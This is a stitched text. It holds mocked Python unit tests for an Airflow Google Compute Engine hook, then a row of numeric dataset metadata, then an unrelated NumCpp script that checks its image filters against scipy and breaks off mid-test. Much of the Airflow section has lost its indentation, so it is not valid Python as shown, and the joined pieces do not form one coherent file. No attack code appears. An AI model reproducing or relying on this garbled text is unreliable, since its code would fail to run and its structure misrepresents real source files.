    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_patch_instance_group_manager_no_project_id(
        self, wait_for_operation_to_complete, get_conn, mock_project_id
    ):
        """patch_instance_group_manager without a project_id raises and performs no API call."""
        patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
        execute_method = patch_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        with self.assertRaises(AirflowException) as cm:
            self.gce_hook_no_project_id.patch_instance_group_manager(
                zone=GCE_ZONE,
                resource_id=GCE_INSTANCE_GROUP_MANAGER,
                body={},
                request_id=GCE_REQUEST_ID
            )
        patch_method.assert_not_called()
        execute_method.assert_not_called()
        err = cm.exception
        self.assertIn("The project id must be passed", str(err))
        wait_for_operation_to_complete.assert_not_called()
class TestGcpComputeHookDefaultProjectId(unittest.TestCase):
def setUp(self):
with mock.patch('airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.__init__',
new=mock_base_gcp_hook_default_project_id):
self.gce_hook = GceHook(gcp_conn_id='test')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_start_instance(self, wait_for_operation_to_complete, get_conn):
start_method = get_conn.return_value.instances.return_value.start
execute_method = start_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.start_instance(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
start_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
operation_name='operation_id',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_start_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
start_method = get_conn.return_value.instances.return_value.start
execute_method = start_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.start_instance(
project_id='new-project',
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
start_method.assert_called_once_with(instance='instance', project='new-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='new-project',
operation_name='operation_id',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_stop_instance(self, wait_for_operation_to_complete, get_conn):
stop_method = get_conn.return_value.instances.return_value.stop
execute_method = stop_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.stop_instance(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
stop_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
operation_name='operation_id',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_stop_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
stop_method = get_conn.return_value.instances.return_value.stop
execute_method = stop_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.stop_instance(
project_id='new-project',
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
stop_method.assert_called_once_with(instance='instance', project='new-project', zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='new-project',
operation_name='operation_id',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_set_machine_type_instance(self, wait_for_operation_to_complete, get_conn):
execute_method = get_conn.return_value.instances.return_value.setMachineType.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.set_machine_type(
body={},
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
operation_name='operation_id',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_set_machine_type_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
execute_method = get_conn.return_value.instances.return_value.setMachineType.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.set_machine_type(
project_id='new-project',
body={},
zone=GCE_ZONE,
resource_id=GCE_INSTANCE)
self.assertIsNone(res)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='new-project',
operation_name='operation_id',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_get_instance_template(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceTemplates.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_template(
resource_id=GCE_INSTANCE_TEMPLATE)
self.assertIsNotNone(res)
get_method.assert_called_once_with(instanceTemplate='instance-template', project='example-project')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_get_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceTemplates.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_template(
project_id='new-project',
resource_id=GCE_INSTANCE_TEMPLATE)
self.assertIsNotNone(res)
get_method.assert_called_once_with(instanceTemplate='instance-template', project='new-project')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_insert_instance_template(self, wait_for_operation_to_complete, get_conn):
insert_method = get_conn.return_value.instanceTemplates.return_value.insert
execute_method = insert_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.insert_instance_template(
body={},
request_id=GCE_REQUEST_ID
)
self.assertIsNone(res)
insert_method.assert_called_once_with(body={}, project='example-project', requestId='request_id')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
operation_name='operation_id')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_insert_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
insert_method = get_conn.return_value.instanceTemplates.return_value.insert
execute_method = insert_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.insert_instance_template(
project_id='new-project',
body={},
request_id=GCE_REQUEST_ID
)
self.assertIsNone(res)
insert_method.assert_called_once_with(body={}, project='new-project', requestId='request_id')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(project_id='new-project',
operation_name='operation_id')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_get_instance_group_manager(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceGroupManagers.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_group_manager(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER
)
self.assertIsNotNone(res)
get_method.assert_called_once_with(instanceGroupManager='instance_group_manager',
project='example-project',
zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_get_instance_group_manager_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
get_method = get_conn.return_value.instanceGroupManagers.return_value.get
execute_method = get_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.get_instance_group_manager(
project_id='new-project',
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER
)
self.assertIsNotNone(res)
get_method.assert_called_once_with(instanceGroupManager='instance_group_manager',
project='new-project',
zone='zone')
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_not_called()
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_patch_instance_group_manager(self, wait_for_operation_to_complete, get_conn):
patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
execute_method = patch_method.return_value.execute
execute_method.return_value = {"name": "operation_id"}
wait_for_operation_to_complete.return_value = None
res = self.gce_hook.patch_instance_group_manager(
zone=GCE_ZONE,
resource_id=GCE_INSTANCE_GROUP_MANAGER,
body={},
request_id=GCE_REQUEST_ID
)
self.assertIsNone(res)
patch_method.assert_called_once_with(
body={},
instanceGroupManager='instance_group_manager',
project='example-project',
requestId='request_id',
zone='zone'
)
execute_method.assert_called_once_with(num_retries=5)
wait_for_operation_to_complete.assert_called_once_with(operation_name='operation_id',
project_id='example-project',
zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
def test_patch_instance_group_manager_overridden_project_id(self,
                                                            wait_for_operation_to_complete,
                                                            get_conn):
    """patch_instance_group_manager() with an explicit ``project_id`` must use
    that project for both the PATCH call and the subsequent wait on the
    resulting operation."""
    # Mock the discovery-client chain: conn.instanceGroupManagers().patch().execute()
    patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
    execute_method = patch_method.return_value.execute
    execute_method.return_value = {"name": "operation_id"}
    wait_for_operation_to_complete.return_value = None
    res = self.gce_hook.patch_instance_group_manager(
        project_id='new-project',
        zone=GCE_ZONE,
        resource_id=GCE_INSTANCE_GROUP_MANAGER,
        body={},
        request_id=GCE_REQUEST_ID
    )
    self.assertIsNone(res)
    patch_method.assert_called_once_with(
        body={},
        instanceGroupManager='instance_group_manager',
        project='new-project',
        requestId='request_id',
        zone='zone'
    )
    execute_method.assert_called_once_with(num_retries=5)
    # The overridden project id must also be used when polling the operation.
    wait_for_operation_to_complete.assert_called_once_with(operation_name='operation_id',
                                                           project_id='new-project',
                                                           zone='zone')
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._check_global_operation_status')
def test_wait_for_operation_to_complete_no_zone(self, mock_operation_status, mock_get_conn):
    """When ``zone`` is None, _wait_for_operation_to_complete must poll the
    *global* operation-status endpoint; a DONE status with no error returns
    cleanly after a single status check."""
    service = "test-service"
    project_id = "test-project"
    operation_name = "test-operation"
    num_retries = self.gce_hook.num_retries
    # Test success
    mock_get_conn.return_value = service
    mock_operation_status.return_value = {'status': GceOperationStatus.DONE, 'error': None}
    self.gce_hook._wait_for_operation_to_complete(project_id=project_id,
                                                  operation_name=operation_name,
                                                  zone=None
                                                  )
    # Exactly one poll of the global status check, with keyword arguments.
    mock_operation_status.assert_called_once_with(service=service,
                                                  operation_name=operation_name,
                                                  project_id=project_id,
                                                  num_retries=num_retries
                                                  )
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._check_global_operation_status')
def test_wait_for_operation_to_complete_no_zone_error(self, mock_operation_status, mock_get_conn):
    """A finished (DONE) global operation that carries an ``error`` payload
    must make _wait_for_operation_to_complete raise AirflowException."""
    service = "test-service"
    project_id = "test-project"
    operation_name = "test-operation"
    # Test error
    mock_get_conn.return_value = service
    # Simulate an operation that completed with errors attached.
    mock_operation_status.return_value = {'status': GceOperationStatus.DONE,
                                          'error': {'errors': "some nasty errors"},
                                          'httpErrorStatusCode': 400,
                                          'httpErrorMessage': 'sample msg'
                                          }
    with self.assertRaises(AirflowException):
        self.gce_hook._wait_for_operation_to_complete(project_id=project_id,
                                                      operation_name=operation_name,
                                                      zone=None
                                                      )
@mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
@mock.patch('airflow.gcp.hooks.compute.GceHook._check_zone_operation_status')
def test_wait_for_operation_to_complete_with_zone(self, mock_operation_status, mock_get_conn):
    """With a ``zone`` supplied, the *zonal* operation-status check is used;
    note it is invoked positionally as (service, operation_name, project_id,
    zone, num_retries), unlike the keyword-style global check."""
    service = "test-service"
    project_id = "test-project"
    operation_name = "test-operation"
    zone = 'west-europe3'
    num_retries = self.gce_hook.num_retries
    # Test success
    mock_get_conn.return_value = service
    mock_operation_status.return_value = {'status': GceOperationStatus.DONE, 'error': None}
    self.gce_hook._wait_for_operation_to_complete(project_id=project_id,
                                                  operation_name=operation_name,
                                                  zone=zone
                                                  )
    mock_operation_status.assert_called_once_with(service, operation_name, project_id, zone, num_retries)
| 53.807976 | 110 | 0.674783 | 4,287 | 36,428 | 5.296944 | 0.04362 | 0.074115 | 0.083143 | 0.093535 | 0.942619 | 0.939317 | 0.934737 | 0.932931 | 0.923507 | 0.914435 | 0 | 0.00109 | 0.244592 | 36,428 | 676 | 111 | 53.887574 | 0.824115 | 0.023114 | 0 | 0.822076 | 0 | 0 | 0.170599 | 0.115063 | 0 | 0 | 0 | 0 | 0.197694 | 1 | 0.054366 | false | 0.011532 | 0.008237 | 0 | 0.065898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
31a22b22ec48128afb9b874ab0675418b2cbb89b | 19,350 | py | Python | unitTests/testScripts/TestFilters.py | JinchengKim/NumCpp | fd0221edc736baaf3370447fc37dace87800813d | [
"MIT"
] | null | null | null | unitTests/testScripts/TestFilters.py | JinchengKim/NumCpp | fd0221edc736baaf3370447fc37dace87800813d | [
"MIT"
] | null | null | null | unitTests/testScripts/TestFilters.py | JinchengKim/NumCpp | fd0221edc736baaf3370447fc37dace87800813d | [
"MIT"
] | null | null | null | import numpy as np
from termcolor import colored
import scipy.ndimage.filters as filters
import sys
if sys.platform == 'linux':
sys.path.append(r'../lib')
else:
sys.path.append(r'../build/x64/Release')
import NumCpp
####################################################################################
def doTest():
    """Entry point for this script: announce the suite, then run every 1D and
    2D filter comparison test in order."""
    print(colored('Testing Filters', 'magenta'))
    for suite in (test1D, test2D):
        suite()
####################################################################################
def test1D():
    """Compare each NumCpp 1d filter against its scipy.ndimage reference
    implementation for every supported boundary mode, printing a colored
    PASS/FAIL line per case.  Inputs are freshly randomized per sub-test."""
    # Map scipy mode names -> NumCpp boundary-mode enum values.
    modes = {'reflect' : NumCpp.Mode.REFLECT,
             'constant': NumCpp.Mode.CONSTANT,
             'nearest': NumCpp.Mode.NEAREST,
             'mirror': NumCpp.Mode.MIRROR,
             'wrap': NumCpp.Mode.WRAP}

    for mode in modes.keys():
        print(colored(f'Testing complementaryMedianFilter1d: mode = {mode}', 'cyan'))
        size = np.random.randint(1000, 2000, [1,]).item()
        cShape = NumCpp.Shape(1, size)
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, [size,])
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            # draw until odd: the filters require an odd kernel size
            kernalSize = np.random.randint(5, 15)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.complementaryMedianFilter1d(cArray, kernalSize, modes[mode], constantValue).getNumpyArray().flatten()
        # complementary median = original signal minus its median-filtered version
        dataOutPy = data - filters.generic_filter(data, np.median, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing convolve1d: mode = {mode}', 'cyan'))
        size = np.random.randint(1000, 2000, [1,]).item()
        cShape = NumCpp.Shape(1, size)
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, [size,]).astype(np.double)
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        weights = np.random.randint(1, 5, [kernalSize,])
        cWeights = NumCpp.NdArray(1, kernalSize)
        cWeights.setArray(weights)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.convolve1d(cArray, cWeights, modes[mode], constantValue).getNumpyArray().flatten()
        dataOutPy = filters.convolve(data, weights, mode=mode, cval=constantValue)
        # rounded comparison: floating-point convolution differs in last digits
        if np.array_equal(np.round(dataOutC, 8), np.round(dataOutPy, 8)):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing gaussianFilter1d: mode = {mode}', 'cyan'))
        size = np.random.randint(1000, 2000, [1,]).item()
        cShape = NumCpp.Shape(1, size)
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, [size,]).astype(np.double)
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            # NOTE(review): kernalSize is computed here but never used by the
            # gaussian filter below — the kernel extent comes from sigma.
            kernalSize = np.random.randint(5, 15)
        sigma = np.random.rand(1).item() * 2
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.gaussianFilter1d(cArray, sigma, modes[mode], constantValue).getNumpyArray().flatten()
        dataOutPy = filters.gaussian_filter(data, sigma, mode=mode, cval=constantValue)
        if np.array_equal(np.round(dataOutC, 7), np.round(dataOutPy, 7)):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing maximumFilter1d: mode = {mode}', 'cyan'))
        size = np.random.randint(1000, 2000, [1,]).item()
        cShape = NumCpp.Shape(1, size)
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, [size,])
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.maximumFilter1d(cArray, kernalSize, modes[mode], constantValue).getNumpyArray().flatten()
        dataOutPy = filters.generic_filter(data, np.max, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing medianFilter1d: mode = {mode}', 'cyan'))
        size = np.random.randint(1000, 2000, [1,]).item()
        cShape = NumCpp.Shape(1, size)
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, [size,])
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.medianFilter1d(cArray, kernalSize, modes[mode], constantValue).getNumpyArray().flatten()
        dataOutPy = filters.generic_filter(data, np.median, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        # ('minumum' below is sic — it matches the NumCpp binding's spelling)
        print(colored(f'Testing minumumFilter1d: mode = {mode}', 'cyan'))
        size = np.random.randint(1000, 2000, [1,]).item()
        cShape = NumCpp.Shape(1, size)
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, [size,])
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.minumumFilter1d(cArray, kernalSize, modes[mode], constantValue).getNumpyArray().flatten()
        dataOutPy = filters.generic_filter(data, np.min, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing percentileFilter1d: mode = {mode}', 'cyan'))
        size = np.random.randint(1000, 2000, [1,]).item()
        cShape = NumCpp.Shape(1, size)
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, [size,]).astype(np.double)
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        percentile = np.random.randint(0, 101, [1,]).item()
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.percentileFilter1d(cArray, kernalSize, percentile, modes[mode], constantValue).getNumpyArray().flatten()
        dataOutPy = filters.generic_filter(data, np.percentile, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue, extra_arguments=(percentile,))
        if np.array_equal(np.round(dataOutC, 7), np.round(dataOutPy, 7)):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing rankFilter1d: mode = {mode}', 'cyan'))
        size = np.random.randint(1000, 2000, [1,]).item()
        cShape = NumCpp.Shape(1, size)
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, [size,]).astype(np.double)
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        rank = np.random.randint(0, kernalSize - 1, [1, ]).item()
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.rankFilter1d(cArray, kernalSize, rank, modes[mode], constantValue).getNumpyArray().flatten()
        dataOutPy = filters.rank_filter(data, rank, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing uniformFilter1d: mode = {mode}', 'cyan'))
        size = np.random.randint(1000, 2000, [1,]).item()
        cShape = NumCpp.Shape(1, size)
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, [size,]).astype(np.double)
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.uniformFilter1d(cArray, kernalSize, modes[mode], constantValue).getNumpyArray().flatten()
        dataOutPy = filters.generic_filter(data, np.mean, footprint=np.ones([kernalSize,]), mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))
####################################################################################
def test2D():
    """Compare each NumCpp 2d filter against its scipy.ndimage reference
    implementation for every supported boundary mode, printing a colored
    PASS/FAIL line per case.  Inputs are freshly randomized per sub-test."""
    # Map scipy mode names -> NumCpp boundary-mode enum values.
    modes = {'reflect' : NumCpp.Mode.REFLECT,
             'constant': NumCpp.Mode.CONSTANT,
             'nearest': NumCpp.Mode.NEAREST,
             'mirror': NumCpp.Mode.MIRROR,
             'wrap': NumCpp.Mode.WRAP}

    for mode in modes.keys():
        print(colored(f'Testing complementaryMedianFilter: mode = {mode}', 'cyan'))
        shape = np.random.randint(1000, 2000, [2,]).tolist()
        cShape = NumCpp.Shape(shape[0], shape[1])
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, shape)
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            # draw until odd: the filters require an odd kernel size
            kernalSize = np.random.randint(5, 15)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.complementaryMedianFilter(cArray, kernalSize, modes[mode], constantValue).getNumpyArray()
        # complementary median = original image minus its median-filtered version
        dataOutPy = data - filters.median_filter(data, size=kernalSize, mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing convolve: mode = {mode}', 'cyan'))
        shape = np.random.randint(1000, 2000, [2,]).tolist()
        cShape = NumCpp.Shape(shape[0], shape[1])
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(10, 20, shape).astype(np.double)
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        weights = np.random.randint(-2, 3, [kernalSize, kernalSize]).astype(np.double)
        cWeights = NumCpp.NdArray(kernalSize)
        cWeights.setArray(weights)
        dataOutC = NumCpp.convolve(cArray, kernalSize, cWeights, modes[mode], constantValue).getNumpyArray()
        dataOutPy = filters.convolve(data, weights, mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing gaussianFilter: mode = {mode}', 'cyan'))
        shape = np.random.randint(1000, 2000, [2,]).tolist()
        cShape = NumCpp.Shape(shape[0], shape[1])
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, shape).astype(np.double)
        cArray.setArray(data)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        sigma = np.random.rand(1).item() * 2
        dataOutC = NumCpp.gaussianFilter(cArray, sigma, modes[mode], constantValue).getNumpyArray()
        dataOutPy = filters.gaussian_filter(data, sigma, mode=mode, cval=constantValue)
        # coarse (2-decimal) comparison: the separable gaussian accumulates error
        if np.array_equal(np.round(dataOutC, 2), np.round(dataOutPy, 2)):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing laplaceFilter: mode = {mode}', 'cyan'))
        shape = np.random.randint(1000, 2000, [2,]).tolist()
        cShape = NumCpp.Shape(shape[0], shape[1])
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, shape).astype(np.double)
        cArray.setArray(data)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.laplaceFilter(cArray, modes[mode], constantValue).getNumpyArray()
        dataOutPy = filters.laplace(data, mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing maximumFilter: mode = {mode}', 'cyan'))
        shape = np.random.randint(1000, 2000, [2,]).tolist()
        cShape = NumCpp.Shape(shape[0], shape[1])
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, shape)
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.maximumFilter(cArray, kernalSize, modes[mode], constantValue).getNumpyArray()
        dataOutPy = filters.maximum_filter(data, size=kernalSize, mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing medianFilter: mode = {mode}', 'cyan'))
        shape = np.random.randint(1000, 2000, [2,]).tolist()
        cShape = NumCpp.Shape(shape[0], shape[1])
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, shape)
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.medianFilter(cArray, kernalSize, modes[mode], constantValue).getNumpyArray()
        dataOutPy = filters.median_filter(data, size=kernalSize, mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing minimumFilter: mode = {mode}', 'cyan'))
        shape = np.random.randint(1000, 2000, [2,]).tolist()
        cShape = NumCpp.Shape(shape[0], shape[1])
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, shape)
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.minimumFilter(cArray, kernalSize, modes[mode], constantValue).getNumpyArray()
